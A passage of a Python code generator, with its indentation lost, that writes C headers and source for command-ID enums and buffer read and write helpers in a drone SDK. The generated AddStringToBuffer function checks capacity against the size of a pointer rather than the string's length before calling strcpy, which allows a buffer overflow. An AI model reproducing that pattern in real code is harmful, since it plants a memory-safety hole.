hasArgOfType[ArArgType.BITFIELD] = True
hasArgOfType[arg.argType.btfType] = True
elif isinstance(arg.argType, ArMultiSetting):
hasArgOfType[ArArgType.MULTISETTING] = True
else:
hasArgOfType[arg.argType] = True
#################################
# 2ND PART : #
#################################
# Write private H files #
#################################
hfile = open (paths.COMMANDSID_HFILE, 'w')
hfile.write (LICENCE_HEADER)
hfile.write ('/********************************************\n')
hfile.write (' * AUTOGENERATED FILE *\n')
hfile.write (' * DO NOT MODIFY IT *\n')
hfile.write (' * *\n')
hfile.write (' * To add new commands : *\n')
hfile.write (' * - Modify ../Xml/commands.xml file *\n')
hfile.write (' * - Re-run generateCommandsList.py script *\n')
hfile.write (' * *\n')
hfile.write (' ********************************************/\n')
hfile.write ('\n')
hfile.write ('#ifndef ' + COMMANDSID_DEFINE + '\n')
hfile.write ('#define ' + COMMANDSID_DEFINE + ' (1)\n')
hfile.write ('\n')
hfile.write ('// ARSDK_NO_ENUM_PREPROCESS //\n')
hfile.write ('typedef enum {\n')
for ftr in allFeatures:
ENAME='FEATURE'
hfile.write (' ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, ENAME, get_ftr_old_name(ftr)) + ' = ' + str(ftr.featureId) + ',\n')
hfile.write ('} ' + AREnumName (LIB_MODULE, ID_SUBMODULE, ENAME) + ';\n')
hfile.write ('\n')
hfile.write ('\n')
hfile.write ('#define ' + ARMacroName (LIB_MODULE, ID_SUBMODULE, 'FEATURE_CLASS') + ' (0) //default class id use by features.\n')
hfile.write ('\n')
hfile.write ('\n')
#project only
for ftr in allFeatures:
if ftr.classes:
ENAME=get_ftr_old_name(ftr) + '_CLASS'
hfile.write ('typedef enum {\n')
for cl in ftr.classes:
hfile.write (' ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, ENAME, cl.name) + ' = ' + str(cl.classId) + ',\n')
hfile.write ('} ' + AREnumName (LIB_MODULE, ID_SUBMODULE, ENAME) + ';\n')
hfile.write ('\n')
hfile.write ('\n')
for ftr in allFeatures:
if ftr.classes: #project only
for cl in ftr.classes:
hfile.write ('typedef enum {\n')
ENAME=get_ftr_old_name(ftr) + '_' + cl.name + '_CMD'
first = True
for cmd in cl.cmds:
hfile.write (' ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, ENAME, cmd.name) + ' = ' + str(cmd.cmdId) + ',\n')
hfile.write ('} ' + AREnumName (LIB_MODULE, ID_SUBMODULE, ENAME) + ';\n')
hfile.write ('\n')
else:
hfile.write ('typedef enum {\n')
ENAME=get_ftr_old_name(ftr) + '_CMD'
first = True
for cmd in ftr.cmds + ftr.evts:
hfile.write (' ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, ENAME, cmd.name) + ' = ' + str(cmd.cmdId) + ',\n')
hfile.write ('} ' + AREnumName (LIB_MODULE, ID_SUBMODULE, ENAME) + ';\n')
hfile.write ('\n')
hfile.write ('\n')
hfile.write ('\n')
hfile.write ('#endif /* ' + COMMANDSID_DEFINE + ' */\n')
hfile.close ()
hfile = open(paths.COMMANDSRW_HFILE, 'w')
hfile.write ('/********************************************\n')
hfile.write (' * AUTOGENERATED FILE *\n')
hfile.write (' * DO NOT MODIFY IT *\n')
hfile.write (' * *\n')
hfile.write (' * To add new commands : *\n')
hfile.write (' * - Modify ../Xml/commands.xml file *\n')
hfile.write (' * - Re-run generateCommandsList.py script *\n')
hfile.write (' * *\n')
hfile.write (' ********************************************/\n')
hfile.write ('\n')
hfile.write ('#ifndef ' + COMMANDSRW_DEFINE + '\n')
hfile.write ('#define ' + COMMANDSRW_DEFINE + ' (1)\n')
hfile.write ('\n')
hfile.write ('#include <inttypes.h>\n')
hfile.write ('#include <string.h>\n')
hfile.write ('#include <stdlib.h>\n')
hfile.write ('\n')
hfile.write ('// ------- //\n')
hfile.write ('// WRITERS //\n')
hfile.write ('// ------- //\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U8] or hasArgOfType[ArArgType.I8]:
hfile.write ('// Add an 8 bit value to the buffer\n')
hfile.write ('// Returns -1 if the buffer is not big enough\n')
hfile.write ('// Returns the new offset in the buffer on success\n')
hfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU8ToBuffer') + ' (uint8_t *buffer, uint8_t newVal, int32_t oldOffset, int32_t buffCap);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U16] or hasArgOfType[ArArgType.I16]:
hfile.write ('// Add a 16 bit value to the buffer\n')
hfile.write ('// Returns -1 if the buffer is not big enough\n')
hfile.write ('// Returns the new offset in the buffer on success\n')
hfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU16ToBuffer') + ' (uint8_t *buffer, uint16_t newVal, int32_t oldOffset, int32_t buffCap);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U32] or hasArgOfType[ArArgType.I32] or hasArgOfType[ArArgType.FLOAT] or hasArgOfType[ArArgType.ENUM]:
hfile.write ('// Add a 32 bit value to the buffer\n')
hfile.write ('// Returns -1 if the buffer is not big enough\n')
hfile.write ('// Returns the new offset in the buffer on success\n')
hfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU32ToBuffer') + ' (uint8_t *buffer, uint32_t newVal, int32_t oldOffset, int32_t buffCap);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U64] or hasArgOfType[ArArgType.I64] or hasArgOfType[ArArgType.DOUBLE]:
hfile.write ('// Add a 64 bit value to the buffer\n')
hfile.write ('// Returns -1 if the buffer is not big enough\n')
hfile.write ('// Returns the new offset in the buffer on success\n')
hfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU64ToBuffer') + ' (uint8_t *buffer, uint64_t newVal, int32_t oldOffset, int32_t buffCap);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.STRING]:
hfile.write ('// Add a NULL Terminated String to the buffer\n')
hfile.write ('// Returns -1 if the buffer is not big enough\n')
hfile.write ('// Returns the new offset in the buffer on success\n')
hfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddStringToBuffer') + ' (uint8_t *buffer, const char *newVal, int32_t oldOffset, int32_t buffCap);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.FLOAT]:
hfile.write ('// Add a float to the buffer\n')
hfile.write ('// Returns -1 if the buffer is not big enough\n')
hfile.write ('// Returns the new offset in the buffer on success\n')
hfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddFloatToBuffer') + ' (uint8_t *buffer, float newVal, int32_t oldOffset, int32_t buffCap);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.DOUBLE]:
hfile.write ('// Add a double to the buffer\n')
hfile.write ('// Returns -1 if the buffer is not big enough\n')
hfile.write ('// Returns the new offset in the buffer on success\n')
hfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddDoubleToBuffer') + ' (uint8_t *buffer, double newVal, int32_t oldOffset, int32_t buffCap);\n')
hfile.write ('\n')
hfile.write ('// ------- //\n')
hfile.write ('// READERS //\n')
hfile.write ('// ------- //\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U8] or hasArgOfType[ArArgType.I8]:
hfile.write ('// Read an 8 bit value from the buffer\n')
hfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
hfile.write ('uint8_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U16] or hasArgOfType[ArArgType.I16]:
hfile.write ('// Read a 16 bit value from the buffer\n')
hfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
hfile.write ('uint16_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U32] or hasArgOfType[ArArgType.I32] or hasArgOfType[ArArgType.ENUM]:
hfile.write ('// Read a 32 bit value from the buffer\n')
hfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
hfile.write ('uint32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read32FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U64] or hasArgOfType[ArArgType.I64]:
hfile.write ('// Read a 64 bit value from the buffer\n')
hfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
hfile.write ('uint64_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read64FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.FLOAT]:
hfile.write ('// Read a float value from the buffer\n')
hfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
hfile.write ('float ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadFloatFromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.DOUBLE]:
hfile.write ('// Read a double value from the buffer\n')
hfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
hfile.write ('double ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadDoubleFromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.STRING]:
hfile.write ('// Read a string value from the buffer\n')
hfile.write ('// On error, return NULL and set *error to 1, else set *error to 0\n')
hfile.write ('const char* ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadStringFromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error);\n')
hfile.write ('\n')
hfile.write ('// -------- //\n')
hfile.write ('// TOSTRING //\n')
hfile.write ('// -------- //\n')
hfile.write ('\n')
if (hasArgOfType[ArArgType.U8] or hasArgOfType[ArArgType.I8] or
hasArgOfType[ArArgType.U16] or hasArgOfType[ArArgType.I16] or
hasArgOfType[ArArgType.U32] or hasArgOfType[ArArgType.I32] or
hasArgOfType[ArArgType.U64] or hasArgOfType[ArArgType.I64] or
hasArgOfType[ArArgType.FLOAT] or hasArgOfType[ArArgType.DOUBLE] or
hasArgOfType[ArArgType.STRING] or hasArgOfType[ArArgType.ENUM]):
hfile.write ('// Write a string in a buffer\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (const char *stringToWrite, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U8]:
hfile.write ('// Write a string in a buffer from an uint8_t arg\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU8') + ' (const char *name, uint8_t arg, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.I8]:
hfile.write ('// Write a string in a buffer from an int8_t arg\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI8') + ' (const char *name, int8_t arg, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U16]:
hfile.write ('// Write a string in a buffer from an uint16_t arg\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU16') + ' (const char *name, uint16_t arg, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.I16]:
hfile.write ('// Write a string in a buffer from an int16_t arg\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI16') + ' (const char *name, int16_t arg, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U32]:
hfile.write ('// Write a string in a buffer from an uint32_t arg\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU32') + ' (const char *name, uint32_t arg, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.I32] or hasArgOfType[ArArgType.ENUM]:
hfile.write ('// Write a string in a buffer from an int32_t arg\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI32') + ' (const char *name, int32_t arg, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U64]:
hfile.write ('// Write a string in a buffer from an uint64_t arg\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU64') + ' (const char *name, uint64_t arg, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.I64]:
hfile.write ('// Write a string in a buffer from an int64_t arg\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI64') + ' (const char *name, int64_t arg, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.FLOAT]:
hfile.write ('// Write a string in a buffer from float arg\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintFloat') + ' (const char *name, float arg, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.DOUBLE]:
hfile.write ('// Write a string in a buffer from a double arg\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintDouble') + ' (const char *name, double arg, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.STRING]:
hfile.write ('// Write a string in a buffer from a string arg\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintString') + ' (const char *name, const char *arg, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
hfile.write ('\n')
hfile.write ('#endif /* ' + COMMANDSRW_DEFINE + ' */\n')
hfile.close ()
#################################
# 3RD PART : #
#################################
# Generate private ReadWrite C #
# file #
#################################
cfile = open (paths.COMMANDSRW_CFILE, 'w')
cfile.write (LICENCE_HEADER)
cfile.write ('/********************************************\n')
cfile.write (' * AUTOGENERATED FILE *\n')
cfile.write (' * DO NOT MODIFY IT *\n')
cfile.write (' * *\n')
cfile.write (' * To add new commands : *\n')
cfile.write (' * - Modify ../Xml/commands.xml file *\n')
cfile.write (' * - Re-run generateCommandsList.py script *\n')
cfile.write (' * *\n')
cfile.write (' ********************************************/\n')
cfile.write ('#include <config.h>\n')
cfile.write ('#include <stdio.h>\n')
cfile.write ('#include "' + COMMANDSRW_HFILE_NAME + '"\n')
cfile.write ('#include <libARSAL/ARSAL_Endianness.h>\n')
cfile.write ('\n')
cfile.write ('// ------- //\n')
cfile.write ('// WRITERS //\n')
cfile.write ('// ------- //\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.U8] or hasArgOfType[ArArgType.I8]:
cfile.write ('// Add an 8 bit value to the buffer\n')
cfile.write ('// Returns -1 if the buffer is not big enough\n')
cfile.write ('// Returns the new offset in the buffer on success\n')
cfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU8ToBuffer') + ' (uint8_t *buffer, uint8_t newVal, int32_t oldOffset, int32_t buffCap)\n')
cfile.write ('{\n')
cfile.write (' int32_t retVal = 0;\n')
cfile.write (' int32_t size = oldOffset + sizeof(newVal);\n')
cfile.write ('\n')
cfile.write (' if (buffCap < size)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' uint8_t *buffptr = &(buffer [oldOffset]);\n')
cfile.write (' uint8_t localVal = newVal;\n')
cfile.write (' memcpy (buffptr, &localVal, sizeof (localVal));\n')
cfile.write (' retVal = oldOffset + sizeof (localVal);\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.U16] or hasArgOfType[ArArgType.I16]:
cfile.write ('// Add a 16 bit value to the buffer\n')
cfile.write ('// Returns -1 if the buffer is not big enough\n')
cfile.write ('// Returns the new offset in the buffer on success\n')
cfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU16ToBuffer') + ' (uint8_t *buffer, uint16_t newVal, int32_t oldOffset, int32_t buffCap)\n')
cfile.write ('{\n')
cfile.write (' int32_t retVal = 0;\n')
cfile.write (' int32_t size = oldOffset + sizeof(newVal);\n')
cfile.write ('\n')
cfile.write (' if (buffCap < size)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' uint8_t *buffptr = &(buffer [oldOffset]);\n')
cfile.write (' uint16_t localVal = htods (newVal);\n')
cfile.write (' memcpy (buffptr, &localVal, sizeof (localVal));\n')
cfile.write (' retVal = oldOffset + sizeof (localVal);\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.U32] or hasArgOfType[ArArgType.I32] or hasArgOfType[ArArgType.FLOAT] or hasArgOfType[ArArgType.ENUM]:
cfile.write ('// Add a 32 bit value to the buffer\n')
cfile.write ('// Returns -1 if the buffer is not big enough\n')
cfile.write ('// Returns the new offset in the buffer on success\n')
cfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU32ToBuffer') + ' (uint8_t *buffer, uint32_t newVal, int32_t oldOffset, int32_t buffCap)\n')
cfile.write ('{\n')
cfile.write (' int32_t retVal = 0;\n')
cfile.write (' int32_t size = oldOffset + sizeof(newVal);\n')
cfile.write ('\n')
cfile.write (' if (buffCap < size)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' uint8_t *buffptr = &(buffer [oldOffset]);\n')
cfile.write (' uint32_t localVal = htodl (newVal);\n')
cfile.write (' memcpy (buffptr, &localVal, sizeof (localVal));\n')
cfile.write (' retVal = oldOffset + sizeof (localVal);\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.U64] or hasArgOfType[ArArgType.I64] or hasArgOfType[ArArgType.DOUBLE]:
cfile.write ('// Add a 64 bit value to the buffer\n')
cfile.write ('// Returns -1 if the buffer is not big enough\n')
cfile.write ('// Returns the new offset in the buffer on success\n')
cfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU64ToBuffer') + ' (uint8_t *buffer, uint64_t newVal, int32_t oldOffset, int32_t buffCap)\n')
cfile.write ('{\n')
cfile.write (' int32_t retVal = 0;\n')
cfile.write (' int32_t size = oldOffset + sizeof(newVal);\n')
cfile.write ('\n')
cfile.write (' if (buffCap < size)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' uint8_t *buffptr = &(buffer [oldOffset]);\n')
cfile.write (' uint64_t localVal = htodll (newVal);\n')
cfile.write (' memcpy (buffptr, &localVal, sizeof (localVal));\n')
cfile.write (' retVal = oldOffset + sizeof (localVal);\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.STRING]:
cfile.write ('// Add a NULL Terminated String to the buffer\n')
cfile.write ('// Returns -1 if the buffer is not big enough\n')
cfile.write ('// Returns the new offset in the buffer on success\n')
cfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddStringToBuffer') + ' (uint8_t *buffer, const char *newVal, int32_t oldOffset, int32_t buffCap)\n')
cfile.write ('{\n')
cfile.write (' int32_t retVal = 0;\n')
cfile.write (' int32_t size = oldOffset + sizeof(newVal);\n')
cfile.write ('\n')
cfile.write (' if (buffCap < size)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' char *buffptr = (char *)& (buffer [oldOffset]);\n')
cfile.write (' strcpy (buffptr, newVal);\n')
cfile.write (' retVal = oldOffset + strlen (newVal) + 1;\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.FLOAT]:
cfile.write ('// Add a float to the buffer\n')
cfile.write ('// Returns -1 if the buffer is not big enough\n')
cfile.write ('// Returns the new offset in the buffer on success\n')
cfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddFloatToBuffer') + ' (uint8_t *buffer, float newVal, int32_t oldOffset, int32_t buffCap)\n')
cfile.write ('{\n')
cfile.write (' union {\n')
cfile.write (' float f;\n')
cfile.write (' uint32_t u32;\n')
cfile.write (' } val = { .f = newVal };\n')
cfile.write (' return ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU32ToBuffer') + ' (buffer, val.u32, oldOffset, buffCap);\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.DOUBLE]:
cfile.write ('// Add a double to the buffer\n')
cfile.write ('// Returns -1 if the buffer is not big enough\n')
cfile.write ('// Returns the new offset in the buffer on success\n')
cfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddDoubleToBuffer') + ' (uint8_t *buffer, double newVal, int32_t oldOffset, int32_t buffCap)\n')
cfile.write ('{\n')
cfile.write (' union {\n')
cfile.write (' double d;\n')
cfile.write (' uint64_t u64;\n')
cfile.write (' } val = { .d = newVal };\n')
cfile.write (' return ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU64ToBuffer') + ' (buffer, val.u64, oldOffset, buffCap);\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('// ------- //\n')
cfile.write ('// READERS //\n')
cfile.write ('// ------- //\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.U8] or hasArgOfType[ArArgType.I8]:
cfile.write ('// Read an 8 bit value from the buffer\n')
cfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
cfile.write ('uint8_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' uint8_t retVal = 0;\n')
cfile.write (' int newOffset = *offset + sizeof (uint8_t);\n')
cfile.write (' if (newOffset > capacity)\n')
cfile.write (' {\n')
cfile.write (' *error = 1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = buffer [*offset];\n')
cfile.write (' *offset = newOffset;\n')
cfile.write (' *error = 0;\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.U16] or hasArgOfType[ArArgType.I16]:
cfile.write ('// Read a 16 bit value from the buffer\n')
cfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
cfile.write ('uint16_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' uint16_t retVal = 0;\n')
cfile.write (' const uint8_t *buffAddr = &buffer[*offset];\n')
cfile.write (' int newOffset = *offset + sizeof (uint16_t);\n')
cfile.write (' if (newOffset > capacity)\n')
cfile.write (' {\n')
cfile.write (' *error = 1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' memcpy (&retVal, buffAddr, sizeof (uint16_t));\n')
cfile.write (' retVal = dtohs (retVal);\n')
cfile.write (' *offset = newOffset;\n')
cfile.write (' *error = 0;\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.U32] or hasArgOfType[ArArgType.I32] or hasArgOfType[ArArgType.ENUM]:
cfile.write ('// Read a 32 bit value from the buffer\n')
cfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
cfile.write ('uint32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read32FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' uint32_t retVal = 0;\n')
cfile.write (' const uint8_t *buffAddr = &buffer[*offset];\n')
cfile.write (' int newOffset = *offset + sizeof (uint32_t);\n')
cfile.write (' if (newOffset > capacity)\n')
cfile.write (' {\n')
cfile.write (' *error = 1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' memcpy (&retVal, buffAddr, sizeof (uint32_t));\n')
cfile.write (' retVal = dtohl (retVal);\n')
cfile.write (' *offset = newOffset;\n')
cfile.write (' *error = 0;\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.U64] or hasArgOfType[ArArgType.I64]:
cfile.write ('// Read a 64 bit value from the buffer\n')
cfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
cfile.write ('uint64_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read64FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' uint64_t retVal = 0;\n')
cfile.write (' const uint8_t *buffAddr = &buffer[*offset];\n')
cfile.write (' int newOffset = *offset + sizeof (uint64_t);\n')
cfile.write (' if (newOffset > capacity)\n')
cfile.write (' {\n')
cfile.write (' *error = 1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' memcpy (&retVal, buffAddr, sizeof (uint64_t));\n')
cfile.write (' retVal = dtohll (retVal);\n')
cfile.write (' *offset = newOffset;\n')
cfile.write (' *error = 0;\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.FLOAT]:
cfile.write ('// Read a float value from the buffer\n')
cfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
cfile.write ('float ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadFloatFromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' float retVal = 0;\n')
cfile.write (' const uint8_t *buffAddr = &buffer[*offset];\n')
cfile.write (' int newOffset = *offset + sizeof (float);\n')
cfile.write (' if (newOffset > capacity)\n')
cfile.write (' {\n')
cfile.write (' *error = 1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' memcpy (&retVal, buffAddr, sizeof (float));\n')
cfile.write (' retVal = dtohf (retVal);\n')
cfile.write (' *offset = newOffset;\n')
cfile.write (' *error = 0;\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.DOUBLE]:
cfile.write ('// Read a double value from the buffer\n')
cfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
cfile.write ('double ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadDoubleFromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' double retVal = 0;\n')
cfile.write (' const uint8_t *buffAddr = &buffer[*offset];\n')
cfile.write (' int newOffset = *offset + sizeof (double);\n')
cfile.write (' if (newOffset > capacity)\n')
cfile.write (' {\n')
cfile.write (' *error = 1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' memcpy (&retVal, buffAddr, sizeof (double));\n')
cfile.write (' retVal = dtohd (retVal);\n')
cfile.write (' *offset = newOffset;\n')
cfile.write (' *error = 0;\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.STRING]:
cfile.write ('// Read a string value from the buffer\n')
cfile.write ('// On error, return NULL and set *error to 1, else set *error to 0\n')
cfile.write ('const char* ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadStringFromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' const char *retVal = NULL;\n')
